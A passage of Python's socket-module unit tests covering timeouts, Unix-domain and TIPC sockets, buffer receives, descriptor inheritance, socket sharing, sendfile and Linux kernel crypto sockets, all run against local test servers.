# The port number being used is sufficient to show that the bind()
# call happened.
testTimeoutDefault = _justAccept
def _testTimeoutDefault(self):
# passing no explicit timeout uses socket's global default
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(42)
try:
self.cli = socket.create_connection((HOST, self.port))
self.addCleanup(self.cli.close)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(self.cli.gettimeout(), 42)
testTimeoutNone = _justAccept
def _testTimeoutNone(self):
# None timeout means the same as sock.settimeout(None)
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(30)
try:
self.cli = socket.create_connection((HOST, self.port), timeout=None)
self.addCleanup(self.cli.close)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(self.cli.gettimeout(), None)
testTimeoutValueNamed = _justAccept
def _testTimeoutValueNamed(self):
self.cli = socket.create_connection((HOST, self.port), timeout=30)
self.assertEqual(self.cli.gettimeout(), 30)
testTimeoutValueNonamed = _justAccept
def _testTimeoutValueNonamed(self):
self.cli = socket.create_connection((HOST, self.port), 30)
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.gettimeout(), 30)
class NetworkConnectionBehaviourTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
def testInsideTimeout(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
time.sleep(3)
conn.send(b"done!")
testOutsideTimeout = testInsideTimeout
def _testInsideTimeout(self):
self.cli = sock = socket.create_connection((HOST, self.port))
data = sock.recv(5)
self.assertEqual(data, b"done!")
def _testOutsideTimeout(self):
self.cli = sock = socket.create_connection((HOST, self.port), timeout=1)
self.assertRaises(socket.timeout, lambda: sock.recv(5))
class TCPTimeoutTest(SocketTCPTest):
def testTCPTimeout(self):
def raise_timeout(*args, **kwargs):
self.serv.settimeout(1.0)
self.serv.accept()
self.assertRaises(socket.timeout, raise_timeout,
"Error generating a timeout exception (TCP)")
def testTimeoutZero(self):
ok = False
try:
self.serv.settimeout(0.0)
foo = self.serv.accept()
except socket.timeout:
self.fail("caught timeout instead of error (TCP)")
except OSError:
ok = True
except:
self.fail("caught unexpected exception (TCP)")
if not ok:
self.fail("accept() returned success when we did not expect it")
@unittest.skipUnless(hasattr(signal, 'alarm'),
'test needs signal.alarm()')
def testInterruptedTimeout(self):
# XXX I don't know how to do this test on MSWindows or any other
# platform that doesn't support signal.alarm() or os.kill(), though
# the bug should have existed on all platforms.
self.serv.settimeout(5.0) # must be longer than alarm
class Alarm(Exception):
pass
def alarm_handler(signal, frame):
raise Alarm
old_alarm = signal.signal(signal.SIGALRM, alarm_handler)
try:
try:
signal.alarm(2) # POSIX allows alarm to be up to 1 second early
foo = self.serv.accept()
except socket.timeout:
self.fail("caught timeout instead of Alarm")
except Alarm:
pass
except:
self.fail("caught other exception instead of Alarm:"
" %s(%s):\n%s" %
(sys.exc_info()[:2] + (traceback.format_exc(),)))
else:
self.fail("nothing caught")
finally:
signal.alarm(0) # shut off alarm
except Alarm:
self.fail("got Alarm in wrong place")
finally:
# no alarm can be pending. Safe to restore old handler.
signal.signal(signal.SIGALRM, old_alarm)
class UDPTimeoutTest(SocketUDPTest):
def testUDPTimeout(self):
def raise_timeout(*args, **kwargs):
self.serv.settimeout(1.0)
self.serv.recv(1024)
self.assertRaises(socket.timeout, raise_timeout,
"Error generating a timeout exception (UDP)")
def testTimeoutZero(self):
ok = False
try:
self.serv.settimeout(0.0)
foo = self.serv.recv(1024)
except socket.timeout:
self.fail("caught timeout instead of error (UDP)")
except OSError:
ok = True
except:
self.fail("caught unexpected exception (UDP)")
if not ok:
self.fail("recv() returned success when we did not expect it")
class TestExceptions(unittest.TestCase):
def testExceptionTree(self):
self.assertTrue(issubclass(OSError, Exception))
self.assertTrue(issubclass(socket.herror, OSError))
self.assertTrue(issubclass(socket.gaierror, OSError))
self.assertTrue(issubclass(socket.timeout, OSError))
def test_setblocking_invalidfd(self):
# Regression test for issue #28471
sock0 = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
sock = socket.socket(
socket.AF_INET, socket.SOCK_STREAM, 0, sock0.fileno())
sock0.close()
self.addCleanup(sock.detach)
with self.assertRaises(OSError):
sock.setblocking(False)
@unittest.skipUnless(sys.platform == 'linux', 'Linux specific test')
class TestLinuxAbstractNamespace(unittest.TestCase):
UNIX_PATH_MAX = 108
def testLinuxAbstractNamespace(self):
address = b"\x00python-test-hello\x00\xff"
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s1:
s1.bind(address)
s1.listen()
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s2:
s2.connect(s1.getsockname())
with s1.accept()[0] as s3:
self.assertEqual(s1.getsockname(), address)
self.assertEqual(s2.getpeername(), address)
def testMaxName(self):
address = b"\x00" + b"h" * (self.UNIX_PATH_MAX - 1)
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
s.bind(address)
self.assertEqual(s.getsockname(), address)
def testNameOverflow(self):
address = "\x00" + "h" * self.UNIX_PATH_MAX
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
self.assertRaises(OSError, s.bind, address)
def testStrName(self):
# Check that an abstract name can be passed as a string.
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
try:
s.bind("\x00python\x00test\x00")
self.assertEqual(s.getsockname(), b"\x00python\x00test\x00")
finally:
s.close()
def testBytearrayName(self):
# Check that an abstract name can be passed as a bytearray.
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
s.bind(bytearray(b"\x00python\x00test\x00"))
self.assertEqual(s.getsockname(), b"\x00python\x00test\x00")
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'test needs socket.AF_UNIX')
class TestUnixDomain(unittest.TestCase):
def setUp(self):
self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
def tearDown(self):
self.sock.close()
def encoded(self, path):
# Return the given path encoded in the file system encoding,
# or skip the test if this is not possible.
try:
return os.fsencode(path)
except UnicodeEncodeError:
self.skipTest(
"Pathname {0!a} cannot be represented in file "
"system encoding {1!r}".format(
path, sys.getfilesystemencoding()))
def bind(self, sock, path):
# Bind the socket
try:
support.bind_unix_socket(sock, path)
except OSError as e:
if str(e) == "AF_UNIX path too long":
self.skipTest(
"Pathname {0!a} is too long to serve as an AF_UNIX path"
.format(path))
else:
raise
def testUnbound(self):
# Issue #30205 (note getsockname() can return None on OS X)
self.assertIn(self.sock.getsockname(), ('', None))
def testStrAddr(self):
# Test binding to and retrieving a normal string pathname.
path = os.path.abspath(support.TESTFN)
self.bind(self.sock, path)
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testBytesAddr(self):
# Test binding to a bytes pathname.
path = os.path.abspath(support.TESTFN)
self.bind(self.sock, self.encoded(path))
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testSurrogateescapeBind(self):
# Test binding to a valid non-ASCII pathname, with the
# non-ASCII bytes supplied using surrogateescape encoding.
path = os.path.abspath(support.TESTFN_UNICODE)
b = self.encoded(path)
self.bind(self.sock, b.decode("ascii", "surrogateescape"))
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testUnencodableAddr(self):
# Test binding to a pathname that cannot be encoded in the
# file system encoding.
if support.TESTFN_UNENCODABLE is None:
self.skipTest("No unencodable filename available")
path = os.path.abspath(support.TESTFN_UNENCODABLE)
self.bind(self.sock, path)
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
class BufferIOTest(SocketConnectedTest):
"""
Test the buffer versions of socket.recv() and socket.send().
"""
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def testRecvIntoArray(self):
buf = array.array("B", [0] * len(MSG))
nbytes = self.cli_conn.recv_into(buf)
self.assertEqual(nbytes, len(MSG))
buf = buf.tobytes()
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
def _testRecvIntoArray(self):
buf = bytes(MSG)
self.serv_conn.send(buf)
def testRecvIntoBytearray(self):
buf = bytearray(1024)
nbytes = self.cli_conn.recv_into(buf)
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvIntoBytearray = _testRecvIntoArray
def testRecvIntoMemoryview(self):
buf = bytearray(1024)
nbytes = self.cli_conn.recv_into(memoryview(buf))
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvIntoMemoryview = _testRecvIntoArray
def testRecvFromIntoArray(self):
buf = array.array("B", [0] * len(MSG))
nbytes, addr = self.cli_conn.recvfrom_into(buf)
self.assertEqual(nbytes, len(MSG))
buf = buf.tobytes()
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
def _testRecvFromIntoArray(self):
buf = bytes(MSG)
self.serv_conn.send(buf)
def testRecvFromIntoBytearray(self):
buf = bytearray(1024)
nbytes, addr = self.cli_conn.recvfrom_into(buf)
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvFromIntoBytearray = _testRecvFromIntoArray
def testRecvFromIntoMemoryview(self):
buf = bytearray(1024)
nbytes, addr = self.cli_conn.recvfrom_into(memoryview(buf))
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvFromIntoMemoryview = _testRecvFromIntoArray
def testRecvFromIntoSmallBuffer(self):
# See issue #20246.
buf = bytearray(8)
self.assertRaises(ValueError, self.cli_conn.recvfrom_into, buf, 1024)
def _testRecvFromIntoSmallBuffer(self):
self.serv_conn.send(MSG)
def testRecvFromIntoEmptyBuffer(self):
buf = bytearray()
self.cli_conn.recvfrom_into(buf)
self.cli_conn.recvfrom_into(buf, 0)
_testRecvFromIntoEmptyBuffer = _testRecvFromIntoArray
TIPC_STYPE = 2000
TIPC_LOWER = 200
TIPC_UPPER = 210
def isTipcAvailable():
"""Check if the TIPC module is loaded
The TIPC module is not loaded automatically on Ubuntu and probably
other Linux distros.
"""
if not hasattr(socket, "AF_TIPC"):
return False
try:
f = open("/proc/modules")
except (FileNotFoundError, IsADirectoryError, PermissionError):
# It's ok if the file does not exist, is a directory or if we
# have not the permission to read it.
return False
with f:
for line in f:
if line.startswith("tipc "):
return True
return False
@unittest.skipUnless(isTipcAvailable(),
"TIPC module is not loaded, please 'sudo modprobe tipc'")
class TIPCTest(unittest.TestCase):
def testRDM(self):
srv = socket.socket(socket.AF_TIPC, socket.SOCK_RDM)
cli = socket.socket(socket.AF_TIPC, socket.SOCK_RDM)
self.addCleanup(srv.close)
self.addCleanup(cli.close)
srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srvaddr = (socket.TIPC_ADDR_NAMESEQ, TIPC_STYPE,
TIPC_LOWER, TIPC_UPPER)
srv.bind(srvaddr)
sendaddr = (socket.TIPC_ADDR_NAME, TIPC_STYPE,
TIPC_LOWER + int((TIPC_UPPER - TIPC_LOWER) / 2), 0)
cli.sendto(MSG, sendaddr)
msg, recvaddr = srv.recvfrom(1024)
self.assertEqual(cli.getsockname(), recvaddr)
self.assertEqual(msg, MSG)
@unittest.skipUnless(isTipcAvailable(),
"TIPC module is not loaded, please 'sudo modprobe tipc'")
class TIPCThreadableTest(unittest.TestCase, ThreadableTest):
def __init__(self, methodName = 'runTest'):
unittest.TestCase.__init__(self, methodName = methodName)
ThreadableTest.__init__(self)
def setUp(self):
self.srv = socket.socket(socket.AF_TIPC, socket.SOCK_STREAM)
self.addCleanup(self.srv.close)
self.srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srvaddr = (socket.TIPC_ADDR_NAMESEQ, TIPC_STYPE,
TIPC_LOWER, TIPC_UPPER)
self.srv.bind(srvaddr)
self.srv.listen()
self.serverExplicitReady()
self.conn, self.connaddr = self.srv.accept()
self.addCleanup(self.conn.close)
def clientSetUp(self):
# There is a hittable race between serverExplicitReady() and the
# accept() call; sleep a little while to avoid it, otherwise
# we could get an exception
time.sleep(0.1)
self.cli = socket.socket(socket.AF_TIPC, socket.SOCK_STREAM)
self.addCleanup(self.cli.close)
addr = (socket.TIPC_ADDR_NAME, TIPC_STYPE,
TIPC_LOWER + int((TIPC_UPPER - TIPC_LOWER) / 2), 0)
self.cli.connect(addr)
self.cliaddr = self.cli.getsockname()
def testStream(self):
msg = self.conn.recv(1024)
self.assertEqual(msg, MSG)
self.assertEqual(self.cliaddr, self.connaddr)
def _testStream(self):
self.cli.send(MSG)
self.cli.close()
class ContextManagersTest(ThreadedTCPSocketTest):
def _testSocketClass(self):
# base test
with socket.socket() as sock:
self.assertFalse(sock._closed)
self.assertTrue(sock._closed)
# close inside with block
with socket.socket() as sock:
sock.close()
self.assertTrue(sock._closed)
# exception inside with block
with socket.socket() as sock:
self.assertRaises(OSError, sock.sendall, b'foo')
self.assertTrue(sock._closed)
def testCreateConnectionBase(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
data = conn.recv(1024)
conn.sendall(data)
def _testCreateConnectionBase(self):
address = self.serv.getsockname()
with socket.create_connection(address) as sock:
self.assertFalse(sock._closed)
sock.sendall(b'foo')
self.assertEqual(sock.recv(1024), b'foo')
self.assertTrue(sock._closed)
def testCreateConnectionClose(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
data = conn.recv(1024)
conn.sendall(data)
def _testCreateConnectionClose(self):
address = self.serv.getsockname()
with socket.create_connection(address) as sock:
sock.close()
self.assertTrue(sock._closed)
self.assertRaises(OSError, sock.sendall, b'foo')
class InheritanceTest(unittest.TestCase):
@unittest.skipUnless(hasattr(socket, "SOCK_CLOEXEC"),
"SOCK_CLOEXEC not defined")
@support.requires_linux_version(2, 6, 28)
def test_SOCK_CLOEXEC(self):
with socket.socket(socket.AF_INET,
socket.SOCK_STREAM | socket.SOCK_CLOEXEC) as s:
self.assertEqual(s.type, socket.SOCK_STREAM)
self.assertFalse(s.get_inheritable())
def test_default_inheritable(self):
sock = socket.socket()
with sock:
self.assertEqual(sock.get_inheritable(), False)
def test_dup(self):
sock = socket.socket()
with sock:
newsock = sock.dup()
sock.close()
with newsock:
self.assertEqual(newsock.get_inheritable(), False)
def test_set_inheritable(self):
sock = socket.socket()
with sock:
sock.set_inheritable(True)
self.assertEqual(sock.get_inheritable(), True)
sock.set_inheritable(False)
self.assertEqual(sock.get_inheritable(), False)
@unittest.skipIf(fcntl is None, "need fcntl")
def test_get_inheritable_cloexec(self):
sock = socket.socket()
with sock:
fd = sock.fileno()
self.assertEqual(sock.get_inheritable(), False)
# clear FD_CLOEXEC flag
flags = fcntl.fcntl(fd, fcntl.F_GETFD)
flags &= ~fcntl.FD_CLOEXEC
fcntl.fcntl(fd, fcntl.F_SETFD, flags)
self.assertEqual(sock.get_inheritable(), True)
@unittest.skipIf(fcntl is None, "need fcntl")
def test_set_inheritable_cloexec(self):
sock = socket.socket()
with sock:
fd = sock.fileno()
self.assertEqual(fcntl.fcntl(fd, fcntl.F_GETFD) & fcntl.FD_CLOEXEC,
fcntl.FD_CLOEXEC)
sock.set_inheritable(True)
self.assertEqual(fcntl.fcntl(fd, fcntl.F_GETFD) & fcntl.FD_CLOEXEC,
0)
def test_socketpair(self):
s1, s2 = socket.socketpair()
self.addCleanup(s1.close)
self.addCleanup(s2.close)
self.assertEqual(s1.get_inheritable(), False)
self.assertEqual(s2.get_inheritable(), False)
@unittest.skipUnless(hasattr(socket, "SOCK_NONBLOCK"),
"SOCK_NONBLOCK not defined")
class NonblockConstantTest(unittest.TestCase):
def checkNonblock(self, s, nonblock=True, timeout=0.0):
if nonblock:
self.assertEqual(s.type, socket.SOCK_STREAM)
self.assertEqual(s.gettimeout(), timeout)
self.assertTrue(
fcntl.fcntl(s, fcntl.F_GETFL, os.O_NONBLOCK) & os.O_NONBLOCK)
if timeout == 0:
# timeout == 0: means that getblocking() must be False.
self.assertFalse(s.getblocking())
else:
# If timeout > 0, the socket will be in a "blocking" mode
# from the standpoint of the Python API. For Python socket
# object, "blocking" means that operations like 'sock.recv()'
# will block. Internally, file descriptors for
# "blocking" Python sockets *with timeouts* are in a
# *non-blocking* mode, and 'sock.recv()' uses 'select()'
# and handles EWOULDBLOCK/EAGAIN to enforce the timeout.
self.assertTrue(s.getblocking())
else:
self.assertEqual(s.type, socket.SOCK_STREAM)
self.assertEqual(s.gettimeout(), None)
self.assertFalse(
fcntl.fcntl(s, fcntl.F_GETFL, os.O_NONBLOCK) & os.O_NONBLOCK)
self.assertTrue(s.getblocking())
@support.requires_linux_version(2, 6, 28)
def test_SOCK_NONBLOCK(self):
# a lot of it seems silly and redundant, but I wanted to test that
# changing back and forth worked ok
with socket.socket(socket.AF_INET,
socket.SOCK_STREAM | socket.SOCK_NONBLOCK) as s:
self.checkNonblock(s)
s.setblocking(1)
self.checkNonblock(s, nonblock=False)
s.setblocking(0)
self.checkNonblock(s)
s.settimeout(None)
self.checkNonblock(s, nonblock=False)
s.settimeout(2.0)
self.checkNonblock(s, timeout=2.0)
s.setblocking(1)
self.checkNonblock(s, nonblock=False)
# defaulttimeout
t = socket.getdefaulttimeout()
socket.setdefaulttimeout(0.0)
with socket.socket() as s:
self.checkNonblock(s)
socket.setdefaulttimeout(None)
with socket.socket() as s:
self.checkNonblock(s, False)
socket.setdefaulttimeout(2.0)
with socket.socket() as s:
self.checkNonblock(s, timeout=2.0)
socket.setdefaulttimeout(None)
with socket.socket() as s:
self.checkNonblock(s, False)
socket.setdefaulttimeout(t)
@unittest.skipUnless(os.name == "nt", "Windows specific")
@unittest.skipUnless(multiprocessing, "need multiprocessing")
class TestSocketSharing(SocketTCPTest):
# This must be classmethod and not staticmethod or multiprocessing
# won't be able to bootstrap it.
@classmethod
def remoteProcessServer(cls, q):
# Recreate socket from shared data
sdata = q.get()
message = q.get()
s = socket.fromshare(sdata)
s2, c = s.accept()
# Send the message
s2.sendall(message)
s2.close()
s.close()
def testShare(self):
# Transfer the listening server socket to another process
# and service it from there.
# Create process:
q = multiprocessing.Queue()
p = multiprocessing.Process(target=self.remoteProcessServer, args=(q,))
p.start()
# Get the shared socket data
data = self.serv.share(p.pid)
# Pass the shared socket to the other process
addr = self.serv.getsockname()
self.serv.close()
q.put(data)
# The data that the server will send us
message = b"slapmahfro"
q.put(message)
# Connect
s = socket.create_connection(addr)
# listen for the data
m = []
while True:
data = s.recv(100)
if not data:
break
m.append(data)
s.close()
received = b"".join(m)
self.assertEqual(received, message)
p.join()
def testShareLength(self):
data = self.serv.share(os.getpid())
self.assertRaises(ValueError, socket.fromshare, data[:-1])
self.assertRaises(ValueError, socket.fromshare, data+b"foo")
def compareSockets(self, org, other):
# socket sharing is expected to work only for blocking socket
# since the internal python timeout value isn't transferred.
self.assertEqual(org.gettimeout(), None)
self.assertEqual(org.gettimeout(), other.gettimeout())
self.assertEqual(org.family, other.family)
self.assertEqual(org.type, other.type)
# If the user specified "0" for proto, then
# internally windows will have picked the correct value.
# Python introspection on the socket however will still return
# 0. For the shared socket, the python value is recreated
# from the actual value, so it may not compare correctly.
if org.proto != 0:
self.assertEqual(org.proto, other.proto)
def testShareLocal(self):
data = self.serv.share(os.getpid())
s = socket.fromshare(data)
try:
self.compareSockets(self.serv, s)
finally:
s.close()
def testTypes(self):
families = [socket.AF_INET, socket.AF_INET6]
types = [socket.SOCK_STREAM, socket.SOCK_DGRAM]
for f in families:
for t in types:
try:
source = socket.socket(f, t)
except OSError:
continue # This combination is not supported
try:
data = source.share(os.getpid())
shared = socket.fromshare(data)
try:
self.compareSockets(source, shared)
finally:
shared.close()
finally:
source.close()
class SendfileUsingSendTest(ThreadedTCPSocketTest):
"""
Test the send() implementation of socket.sendfile().
"""
FILESIZE = (10 * 1024 * 1024) # 10 MiB
BUFSIZE = 8192
FILEDATA = b""
TIMEOUT = 2
@classmethod
def setUpClass(cls):
def chunks(total, step):
assert total >= step
while total > step:
yield step
total -= step
if total:
yield total
chunk = b"".join([random.choice(string.ascii_letters).encode()
for i in range(cls.BUFSIZE)])
with open(support.TESTFN, 'wb') as f:
for csize in chunks(cls.FILESIZE, cls.BUFSIZE):
f.write(chunk)
with open(support.TESTFN, 'rb') as f:
cls.FILEDATA = f.read()
assert len(cls.FILEDATA) == cls.FILESIZE
@classmethod
def tearDownClass(cls):
support.unlink(support.TESTFN)
def accept_conn(self):
self.serv.settimeout(MAIN_TIMEOUT)
conn, addr = self.serv.accept()
conn.settimeout(self.TIMEOUT)
self.addCleanup(conn.close)
return conn
def recv_data(self, conn):
received = []
while True:
chunk = conn.recv(self.BUFSIZE)
if not chunk:
break
received.append(chunk)
return b''.join(received)
def meth_from_sock(self, sock):
# Depending on the mixin class being run return either send()
# or sendfile() method implementation.
return getattr(sock, "_sendfile_use_send")
# regular file
def _testRegularFile(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, self.FILESIZE)
self.assertEqual(file.tell(), self.FILESIZE)
def testRegularFile(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# non regular file
def _testNonRegularFile(self):
address = self.serv.getsockname()
file = io.BytesIO(self.FILEDATA)
with socket.create_connection(address) as sock, file as file:
sent = sock.sendfile(file)
self.assertEqual(sent, self.FILESIZE)
self.assertEqual(file.tell(), self.FILESIZE)
self.assertRaises(socket._GiveupOnSendfile,
sock._sendfile_use_sendfile, file)
def testNonRegularFile(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# empty file
def _testEmptyFileSend(self):
address = self.serv.getsockname()
filename = support.TESTFN + "2"
with open(filename, 'wb'):
self.addCleanup(support.unlink, filename)
file = open(filename, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, 0)
self.assertEqual(file.tell(), 0)
def testEmptyFileSend(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(data, b"")
# offset
def _testOffset(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file, offset=5000)
self.assertEqual(sent, self.FILESIZE - 5000)
self.assertEqual(file.tell(), self.FILESIZE)
def testOffset(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE - 5000)
self.assertEqual(data, self.FILEDATA[5000:])
# count
def _testCount(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
count = 5000007
meth = self.meth_from_sock(sock)
sent = meth(file, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count)
def testCount(self):
count = 5000007
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[:count])
# count small
def _testCountSmall(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
count = 1
meth = self.meth_from_sock(sock)
sent = meth(file, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count)
def testCountSmall(self):
count = 1
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[:count])
# count + offset
def _testCountWithOffset(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
count = 100007
meth = self.meth_from_sock(sock)
sent = meth(file, offset=2007, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count + 2007)
def testCountWithOffset(self):
count = 100007
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[2007:count+2007])
# non blocking sockets are not supposed to work
def _testNonBlocking(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
sock.setblocking(False)
meth = self.meth_from_sock(sock)
self.assertRaises(ValueError, meth, file)
self.assertRaises(ValueError, sock.sendfile, file)
def testNonBlocking(self):
conn = self.accept_conn()
if conn.recv(8192):
self.fail('was not supposed to receive any data')
# timeout (non-triggered)
def _testWithTimeout(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, self.FILESIZE)
def testWithTimeout(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# timeout (triggered)
def _testWithTimeoutTriggeredSend(self):
address = self.serv.getsockname()
with open(support.TESTFN, 'rb') as file:
with socket.create_connection(address) as sock:
sock.settimeout(0.01)
meth = self.meth_from_sock(sock)
self.assertRaises(socket.timeout, meth, file)
def testWithTimeoutTriggeredSend(self):
conn = self.accept_conn()
conn.recv(88192)
# errors
def _test_errors(self):
pass
def test_errors(self):
with open(support.TESTFN, 'rb') as file:
with socket.socket(type=socket.SOCK_DGRAM) as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(
ValueError, "SOCK_STREAM", meth, file)
with open(support.TESTFN, 'rt') as file:
with socket.socket() as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(
ValueError, "binary mode", meth, file)
with open(support.TESTFN, 'rb') as file:
with socket.socket() as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(TypeError, "positive integer",
meth, file, count='2')
self.assertRaisesRegex(TypeError, "positive integer",
meth, file, count=0.1)
self.assertRaisesRegex(ValueError, "positive integer",
meth, file, count=0)
self.assertRaisesRegex(ValueError, "positive integer",
meth, file, count=-1)
@unittest.skipUnless(hasattr(os, "sendfile"),
'os.sendfile() required for this test.')
class SendfileUsingSendfileTest(SendfileUsingSendTest):
"""
Test the sendfile() implementation of socket.sendfile().
"""
def meth_from_sock(self, sock):
return getattr(sock, "_sendfile_use_sendfile")
@unittest.skipUnless(HAVE_SOCKET_ALG, 'AF_ALG required')
class LinuxKernelCryptoAPI(unittest.TestCase):
# tests for AF_ALG
def create_alg(self, typ, name):
sock = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
try:
sock.bind((typ, name))
except FileNotFoundError as e:
# type / algorithm is not available
sock.close()
raise unittest.SkipTest(str(e), typ, name)
else:
return sock
# bpo-31705: On kernel older than 4.5, sendto() failed with ENOKEY,
# at least on ppc64le architecture
@support.requires_linux_version(4, 5)
def test_sha256(self):
expected = bytes.fromhex("ba7816bf8f01cfea414140de5dae2223b00361a396"
"177a9cb410ff61f20015ad")
with self.create_alg('hash', 'sha256') as algo:
op, _ = algo.accept()
with op:
op.sendall(b"abc")
self.assertEqual(op.recv(512), expected)
op, _ = algo.accept()
with op:
op.send(b'a', socket.MSG_MORE)
op.send(b'b', socket.MSG_MORE)
op.send(b'c', socket.MSG_MORE)
op.send(b'')
self.assertEqual(op.recv(512), expected)
def test_hmac_sha1(self):
expected = bytes.fromhex("effcdf6ae5eb2fa2d27416d5f184df9c259a7c79")
with self.create_alg('hash', 'hmac(sha1)') as algo:
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, b"Jefe")
op, _ = algo.accept()
with op:
op.sendall(b"what do ya want for nothing?")
self.assertEqual(op.recv(512), expected)
# Although it should work with 3.19 and newer the test blocks on
# Ubuntu 15.10 with Kernel 4.2.0-19.
@support.requires_linux_version(4, 3)
def test_aes_cbc(self):
key = bytes.fromhex('06a9214036b8a15b512e03d534120006')
iv = bytes.fromhex('3dafba429d9eb430b422da802c9fac41')
msg = b"Single block msg"
ciphertext = bytes.fromhex('e353779c1079aeb82708942dbe77181a')
msglen = len(msg)
with self.create_alg('skcipher', 'cbc(aes)') as algo:
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, key)
op, _ = algo.accept()
with op:
op.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, iv=iv,
flags=socket.MSG_MORE)
op.sendall(msg)
self.assertEqual(op.recv(msglen), ciphertext)
op, _ = algo.accept()
with op:
op.sendmsg_afalg([ciphertext],
op=socket.ALG_OP_DECRYPT, iv=iv)
self.assertEqual(op.recv(msglen), msg)
# long message
multiplier = 1024
longmsg = [msg] * multiplier
op, _ = algo.accept()
with op:
op.sendmsg_afalg(longmsg,
op=socket.ALG_OP_ENCRYPT, iv=iv)
enc = op.recv(msglen * multiplier)
self.assertEqual(len(enc), msglen * multiplier)
self.assertEqual(enc[:msglen], ciphertext)
op, _ = algo.accept()
with op:
op.sendmsg_afalg([enc],
op=socket.ALG_OP_DECRYPT, iv=iv)
dec = op.recv(msglen * multiplier)
self.assertEqual(len(dec), msglen * multiplier)
self.assertEqual(dec, msg * multiplier)
@support.requires_linux_version(4, 9) # see issue29324
def test_aead_aes_gcm(self):
key = bytes.fromhex('c939cc13397c1d37de6ae0e1cb7c423c')
iv = bytes.fromhex('b3d8cc017cbb89b39e0f67e2')
plain = bytes.fromhex('c3b3c41f113a31b73d9a5cd432103069')
assoc = bytes.fromhex('24825602bd12a984e0092d3e448eda5f')
expected_ct = bytes.fromhex('93fe7d9e9bfd10348a5606e5cafa7354')
expected_tag = bytes.fromhex('0032a1dc85f1c9786925a2e71d8272dd')
taglen = len(expected_tag)
assoclen = len(assoc)
